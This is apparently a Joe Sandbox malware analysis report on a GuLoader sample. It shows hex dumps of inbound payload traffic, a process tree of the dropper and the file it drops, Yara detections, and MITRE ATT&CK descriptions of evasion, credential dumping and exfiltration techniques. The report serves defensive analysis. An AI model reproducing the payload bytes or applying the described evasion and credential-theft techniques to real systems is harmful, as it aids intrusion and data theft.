2021-12-02 06:09:37 UTC	98	IN	Data Raw: 02 1c 28 ca 95 79 c1 4e 6a 16 d0 d9 3a ea 5d f6 56 32 cb 8e 9c fe cd 27 11 63 26 08 91 2e e6 73 fe 54 58 dc 9f f5 f5 3a aa 88 33 02 88 ce c9 96 6c f1 24 01 da 44 9f 17 a5 40 a0 ea 70 a2 2c 6d 14 67 a8 c9 21 03 ba f3 c6 84 28 9f 49 88 d6 b5 0c 17 c9 e6 be 0d 6f 7f 97 6c d9 96 82 d2 0d 09 c4 6f f9 1f 93 8b 74 ed 66 ef 22 a5 33 cc d3 45 c7 cf 23 d9 72 55 48 65 d1 10 8e 3b b9 8d 03 48 bd 1f 1b 96 56 d7 31 9f fd 89 f3 aa 48 6f 84 c4 e4 6c 0d e4 ba 8f 2c 19 ab 81 79 a0 4a b6 6c f3 01 ba ad 50 9b 64 a5 d1 7b 30 89 cf 42 66 63 ce 4d 54 46 77 f7 95 da 7f 44 a9 71 1a d6 13 32 68 a4 7c 7b 6c 47 47 83 72 8f ff 74 69 5a a4 5c 3d ef c1 46 d7 3a 62 96 fd 80 59 e8 71 3d d9 44 a8 0a 90 b8 e2 a1 09 02 c9 a1 e7 2a 99 4a 10 6e 23 e1 20 da de ab 74 c5 e2 20 a1 bb 5a af 8c c1 Data Ascii: (yNj:]V2'c&.sTX:3l$D@p,mg!(Iolotf"3E#rUHe;HV1Hol,yJlPd{0BfcMTFwDq2h\|{lGGrtiZ\=F:bYq=D*Jn# t Z
2021-12-02 06:09:37 UTC	99	IN	Data Raw: ba e8 d5 6d 95 ce dd 7c e3 76 c1 43 e7 bd 66 ba 29 a5 eb e9 f7 6b 7e c4 02 51 4c b7 37 39 41 97 02 08 a3 62 b8 bd c7 7a 56 20 1c 11 40 0c 9b e6 0f aa 09 e0 29 94 85 55 aa f3 5b 0e 98 d8 5d e8 c4 be 75 c2 b8 8f 97 2a 9a 64 fe 82 bd e6 5c 55 c3 c4 34 1a 57 d7 8a 95 34 e5 15 ce 7e a3 2b 91 1c d5 24 06 ee 71 4e 44 7c 59 1b e0 34 41 d6 34 0a da ad e2 0a 52 1d 55 57 07 d8 f8 e2 0d d7 f9 13 e9 bb b8 d5 b1 9b 8f 62 8f 37 92 c6 42 0d bd de 38 7c be 1c 3e 13 60 fa b4 eb 13 9b 26 44 0f a6 15 93 99 b3 5d cb 9d 95 55 6a d1 f9 14 fe 3a 76 63 26 ec 29 5d a0 bb 0d 4f d7 d2 98 a0 f7 c5 e7 0e 23 38 6b 25 83 73 8e b1 34 57 4c b6 60 2d 19 02 e5 d1 cf 9c 90 ef 54 da c9 7f 64 7a da ea e5 5c f1 45 6a 8d a4 73 af 22 c5 d2 22 29 fa 30 7a f5 32 02 7d cd 9c be 8e 67 b9 17 92 cf 24 Data Ascii: m\|vCf)k~QL79AbzV @)U[]u*d\U4W4~+$qND\|Y4A4RUWb7B8\|>`&D]Uj:vc&)]O#8k%s4WL`-Tdz\Ejs"")0z2}g$
2021-12-02 06:09:37 UTC	100	IN	Data Raw: f6 d3 6a c7 e0 27 49 73 3d 48 41 d0 64 0e c4 b8 fe 03 72 bd 30 1b b9 56 d7 79 0f fc a9 bf fa 49 14 c8 65 e5 56 0d a7 ba dd 2c 5c ab c5 2b 0a 4b 98 74 de 00 ba ad 50 9b 1f a5 92 7b 62 89 8a 42 28 63 b3 4d 54 46 77 f7 ee 28 b3 45 fb 97 d1 d7 51 e8 9a a5 7c b1 e3 46 17 39 8f 8e 90 74 0f 5a cd 54 51 ef 24 40 a4 3a e2 94 fd 80 fc e8 02 3d 85 d4 74 0b e9 26 03 a0 6a 01 a6 a1 11 59 fc 4a e2 79 5a e1 a0 c9 de ab a7 d5 9b 20 4f bf 39 af 63 c1 31 c2 47 9d ed 40 37 f2 4b 1a 7b cc f7 1e 9f 37 d3 36 ca ae 96 e7 98 14 c2 73 91 f4 8d b1 ff b2 5e cb 6e 28 23 d1 0d f6 9d 27 28 7d 45 3f d8 af cd ea e6 ac 15 cc 04 15 dd bb e4 f8 6d 45 7c 84 28 04 20 ce da 91 2e c9 15 61 68 ff 8c 35 90 08 ec d9 2d 34 0a fd 28 bb f8 3a 4c c8 8e 28 b6 8f 49 1e 58 3a 14 14 60 74 e2 37 81 9c 67 Data Ascii: j'Is=HAdr0VyIeV,\+KtP{bB(cMTFw(EQ\|F9tZTQ$@:=t&jYJyZ O9c1G@7K{76s^n(#'(}E?mE\|( .ah5-4(:L(IX:`t7g
2021-12-02 06:09:37 UTC	102	IN	Data Raw: a2 23 ca e9 4a bf b2 59 6c ff a0 e9 f4 27 05 5d 90 4d 64 a2 16 44 67 08 0f ef 8f 28 8f a7 02 56 d2 3d a3 98 a8 ec 2e 8c be 2d 60 8f 40 7b 83 25 52 44 45 a6 b1 13 a7 b3 28 31 0d 05 f1 fa 41 69 75 7b fa 79 e7 f7 da df a2 2b 8c e4 85 e1 24 67 8d d0 1b 1c 5f 96 85 ff 43 c5 b7 f2 fc 06 a5 f1 49 75 b6 de bf 7f 49 4e 48 0f 17 20 02 23 bc 7a ea 4d 61 6e 45 04 92 cd 68 09 ac 8c 52 5b 0a 77 fb ef 93 b5 b4 16 e3 9b 64 ad 47 ec 48 fd fc 9b 72 6c 80 50 48 c9 a3 4e 0d 62 22 dd f5 24 88 b0 ac 6a ed ee c9 1c 4f 80 c7 96 dd 3f 38 08 61 7d 1a 5c 1d df 03 62 25 41 d1 95 a6 fc 55 cd f9 7b 17 99 49 d4 51 b5 c3 21 41 82 63 ed 96 0d 6e 11 93 25 99 2f 98 f1 78 97 ad 93 86 c1 d9 60 c1 b8 b6 f3 0f 9f 7d 9b f9 fd 31 fd 17 7f 2b a8 81 86 77 96 2d 16 02 9e b5 b7 a2 0a bd fe ec 02 1c Data Ascii: #JYl']MdDg(V=.-`@{%RDE(1Aiu{y+$g_CIuINH #zManEhR[wdGHrlPHNb"$jO?8a}\b%AU{IQ!Acn%/x`}1+w-
2021-12-02 06:09:37 UTC	103	IN	Data Raw: e8 02 3d 85 44 fb 0a e9 b8 8c a1 6a 02 a6 a1 91 2a fc 4a 62 6e 5a e1 20 da de ab 27 c5 9b 20 cf bb 39 af e3 c1 31 c2 47 a9 7d 41 37 e0 db 1b 7b ee 67 1f 9f 37 d3 36 ca 27 96 80 fd 60 a3 17 f5 86 e4 df 99 dd 5e 43 6e 4e 51 b4 68 97 f9 43 5a 14 2b 59 b7 af cd bd b5 9e 4a ff 36 3b b9 d7 88 f8 6d 47 7e c3 4d 70 6c af a9 e5 6b bb 67 0e 1a ff 8c 46 94 5b 89 ad 61 55 79 89 6d c9 8a 55 3e c8 8e e3 b4 c7 2c 7f 28 7b 78 78 0f 17 e2 f8 83 d4 02 4f 43 e6 a8 6a 48 3f 36 73 72 d4 72 c7 3d cf 96 f3 ab 64 6d 80 af a2 a6 a0 ed b6 6b c9 59 8c c5 14 c4 3f 0d d6 d7 62 a5 10 9c 86 b0 ad 99 d5 5f 97 49 ce 4b 77 5d f6 2c bc a9 da 85 92 d1 94 91 29 17 7e 2a e4 e4 63 da 81 4c 9d 6c ef 1c 28 6b bc 04 f0 64 bd 18 63 25 58 b2 77 cd d9 be 83 a8 82 e7 1f 6e 54 ca 57 0d 31 22 a2 9a 8a Data Ascii: =DjJbnZ ' 91G}A7{g76'`^CnNQhCZ+YJ6;mG~MplkgF[aUymU>,({xxOCjH?6srr=dmkY?b_IKw],)~cLl(kdc%XwnTW1"
2021-12-02 06:09:37 UTC	104	IN	Data Raw: b3 2c ea 7a da ea e5 ca c1 42 1d a1 c5 7d 41 98 94 db bb 30 3e 5d 7d 7a c6 68 0d f8 39 dd 67 c4 2c 73 0c fd ac 16 cb 8a 04 6b 86 0d 62 22 dd f5 24 88 b0 ac 6a ed ee c9 1c 4f 80 c7 96 dd 3f 38 08 61 7d 1a 5c 1d df 03 62 25 41 d1 95 a6 fc 55 cd f9 7b 17 99 49 d4 51 b5 c3 21 41 82 63 ed 96 0d 6e 11 93 25 99 2f 98 f1 78 97 ad 93 86 c1 d9 60 c1 b8 b6 f3 0f 9f 7d 9b f9 fd 31 fd 17 7f 2b a8 81 86 77 96 2d 16 02 9e b5 b7 a2 0a bd fe ec 02 1c 28 ca 95 5c c1 3d 6a 4a d0 8a 3a 9f 5d 86 56 57 cb fc 9c ae cd 52 11 17 26 7c 91 57 e6 73 fe 07 58 b9 9f 86 f5 49 aa e1 33 6d 88 a0 c9 e5 6c db 24 01 da 37 9f 71 a5 34 a0 9a 70 98 2c 42 14 48 a8 c9 21 65 ba 87 c6 f4 28 a5 49 a7 d6 9a 0c 17 c9 e6 be 6b 6f 0b 97 1c d9 e5 82 e8 0d 26 c4 40 f9 1f 93 e3 74 99 66 9b 22 d5 33 f6 d3 Data Ascii: ,zB}A0>]}zh9g,skb"$jO?8a}\b%AU{IQ!Acn%/x`}1+w-(\=jJ:]VWR&\|WsXI3ml$7q4p,BH!e(Iko&@tf"3
2021-12-02 06:09:37 UTC	106	IN	Data Raw: 67 0e 1a ff 8c 46 94 5b 89 ad 61 55 79 89 6d c9 8a 55 3e c8 8e e3 b4 c7 2c 7f 28 7b 78 78 0f 17 e2 f8 83 d4 02 4f 43 e6 a8 6a 48 3f 36 73 72 d4 72 c7 3d cf 96 f3 ab 64 6d 80 af a2 a6 a0 ed b6 6b c9 59 8c c5 14 c4 3f 0d d6 d7 62 a5 10 9c 86 b0 ad 99 d5 5f 97 49 ce 4b 77 5d f6 2c bc a9 da 85 92 d1 94 91 29 17 7e 2a e4 e4 63 da 81 4c 9d 6c ef 1c 28 6b bc 04 f0 64 bd 18 63 25 58 b2 77 cd d9 be 83 a8 82 e7 1f 6e 54 ca 57 0d 31 22 a2 9a 8a b0 19 e1 ab af 5c d9 5f cc 49 a4 d2 16 c3 5b cc 8c 81 83 4b 56 a7 2b 71 7d 8e 0e 01 6c a5 32 38 9a 42 da c4 e7 30 39 45 6e 76 25 62 bb af 6d d9 6c 8e 05 b4 c4 39 c6 d3 09 67 ff b0 29 9b e4 ec 10 b1 dd fd e1 4f fe 4a f3 88 b0 ec 11 3a b1 a1 14 73 39 b1 e5 e7 59 84 61 a7 11 cd 11 b1 74 a1 50 76 d4 5e 61 33 0b 2e 35 89 56 32 b3 Data Ascii: gF[aUymU>,({xxOCjH?6srr=dmkY?b_IKw],)~*cLl(kdc%XwnTW1"\_I[KV+q}l28B09Env%bml9g)OJ:s9YatPv^a3.5V2
2021-12-02 06:09:37 UTC	107	IN	Data Raw: 86 c1 d9 60 c1 b8 b6 f3 0f 9f 7d 9b f9 fd 31 fd 17 7f 2b a8 81 86 77 96 2d 16 02 9e b5 b7 a2 0a bd fe ec 02 1c 28 ca 95 5c c1 3d 6a 4a d0 8a 3a 9f 5d 86 56 57 cb fc 9c ae cd 52 11 17 26 7c 91 57 e6 73 fe 07 58 b9 9f 86 f5 49 aa e1 33 6d 88 a0 c9 e5 6c db 24 01 da 37 9f 71 a5 34 a0 9a 70 98 2c 42 14 48 a8 c9 21 65 ba 87 c6 f4 28 a5 49 a7 d6 9a 0c 17 c9 e6 be 6b 6f 0b 97 1c d9 e5 82 e8 0d 26 c4 40 f9 1f 93 e3 74 99 66 9b 22 d5 33 f6 d3 6a c7 e0 23 d9 72 3d 48 11 d1 64 8e 4b b9 fe 03 72 bd 30 1b b9 56 d7 31 9f fd a9 f3 aa 48 14 84 ea e4 56 0d a7 ba dd 2c 5c ab c5 79 9a 4a 98 6c 8e 01 ba ad 50 9b 1f a5 92 7b 62 89 8a 42 28 63 b3 4d 54 46 77 f7 ee da 3c 44 fb 71 5e d6 51 32 15 a4 7c 7b 6c 47 17 83 00 8f 90 74 0f 5a cd 5c 51 ef a4 46 a4 3a 62 96 fd 80 7c e8 02 Data Ascii: `}1+w-(\=jJ:]VWR&\|WsXI3ml$7q4p,BH!e(Iko&@tf"3j#r=HdKr0V1HV,\yJlP{bB(cMTFw<Dq^Q2\|{lGtZ\QF:b\|
2021-12-02 06:09:37 UTC	108	IN	Data Raw: 81 4c 9d 6c ef 1c 28 6b bc 04 f0 64 bd 18 63 25 58 b2 77 cd d9 be 83 a8 82 e7 1f 6e 54 ca 57 0d 31 22 a2 9a 8a b0 19 e1 ab af 5c d9 5f cc 49 a4 d2 16 c3 5b cc 8c 81 83 4b 56 a7 2b 71 7d 8e 0e 01 6c a5 32 38 9a 42 da c4 e7 30 39 45 6e 76 25 62 bb af 6d d9 6c 8e 05 b4 c4 39 c6 d3 09 67 ff b0 29 9b e4 ec 10 b1 dd fd e1 4f fe 4a f3 88 b0 ec 11 3a b1 a1 14 73 39 b1 e5 e7 59 84 61 a7 11 cd 11 b1 74 a1 50 76 d4 5e 61 33 0b 2e 35 89 56 32 b3 5a 79 b5 cb 96 7d 33 6f 30 79 64 b7 95 cd 00 dd f4 19 e9 bb b8 d5 b1 9b 8f 62 8f 37 92 c6 42 0d bd de 38 7c be 1c 3e 13 60 fa b4 eb 13 9b 26 44 0f a6 15 93 99 b3 5d cb 9d 95 55 6a d1 f9 14 fe 3a 76 63 26 ec 29 5d a0 bb 0d 4f d7 d2 98 1d 40 8b 8c cf 06 15 6f d3 55 27 62 6c 96 35 61 d9 e5 26 4e 2f ef d9 de d8 9f 87 b0 92 b3 2c Data Ascii: Ll(kdc%XwnTW1"\_I[KV+q}l28B09Env%bml9g)OJ:s9YatPv^a3.5V2Zy}3o0ydb7B8\|>`&D]Uj:vc&)]O@oU'bl5a&N/,
2021-12-02 06:09:37 UTC	109	IN	Data Raw: 28 a5 49 a7 d6 9a 0c 17 c9 e6 be 6b 6f 0b 97 1c d9 e5 82 e8 0d 26 c4 40 f9 1f 93 e3 74 99 66 9b 22 d5 33 f6 d3 6a c7 e0 23 d9 72 3d 48 11 d1 64 8e 4b b9 fe 03 72 bd 30 1b b9 56 d7 31 9f fd a9 f3 aa 48 14 84 ea e4 56 0d a7 ba dd 2c 5c ab c5 79 9a 4a 98 6c 8e 01 ba ad 50 9b 1f a5 92 7b 62 89 8a 42 28 63 b3 4d 54 46 77 f7 ee da 3c 44 fb 71 5e d6 51 32 15 a4 7c 7b 6c 47 17 83 00 8f 90 74 0f 5a cd 5c 51 ef a4 46 a4 3a 62 96 fd 80 7c e8 02 3d 85 44 fb 0a e9 b8 8c a1 6a 02 a6 a1 91 2a fc 4a 62 6e 5a e1 20 da de ab 27 c5 9b 20 cf bb 39 af e3 c1 31 c2 47 a9 7d 41 37 e0 db 1b 7b ee 67 1f 9f 37 d3 36 ca 27 96 80 fd 60 a3 17 f5 86 e4 df 99 dd 5e 43 6e 4e 51 b4 68 97 f9 43 5a 14 2b 59 b7 af cd bd b5 9e 4a ff 36 3b b9 d7 88 f8 6d 47 7e c3 4d 70 6c af a9 e5 6b bb 67 0e Data Ascii: (Iko&@tf"3j#r=HdKr0V1HV,\yJlP{bB(cMTFw<Dq^Q2\|{lGtZ\QF:b\|=Dj*JbnZ ' 91G}A7{g76'`^CnNQhCZ+YJ6;mG~Mplkg

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: lzJWJgZhPc.exe PID: 3148 Parent PID: 5016

General

Start time:	07:07:55
Start date:	02/12/2021
Path:	C:\Users\user\Desktop\lzJWJgZhPc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\lzJWJgZhPc.exe"
Imagebase:	0x400000
File size:	191165 bytes
MD5 hash:	46984F492D6314442D1A502D7AB460C4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Analysis Process: Form_Sporogeni.exe PID: 3404 Parent PID: 3148

General

Start time:	07:08:03
Start date:	02/12/2021
Path:	C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe
Imagebase:	0x400000
File size:	99196928 bytes
MD5 hash:	3C6FB2D5CB7A8CCF575C378C5883EAC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.411449067.00000000080A0000.00000040.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Analysis Process: Form_Sporogeni.exe PID: 1740 Parent PID: 3404

General

Start time:	07:08:53
Start date:	02/12/2021
Path:	C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe
Imagebase:	0x400000
File size:	99196928 bytes
MD5 hash:	3C6FB2D5CB7A8CCF575C378C5883EAC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000C.00000000.410653501.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report lzJWJgZhPc

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: GuLoader

Yara Overview

Memory Dumps

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph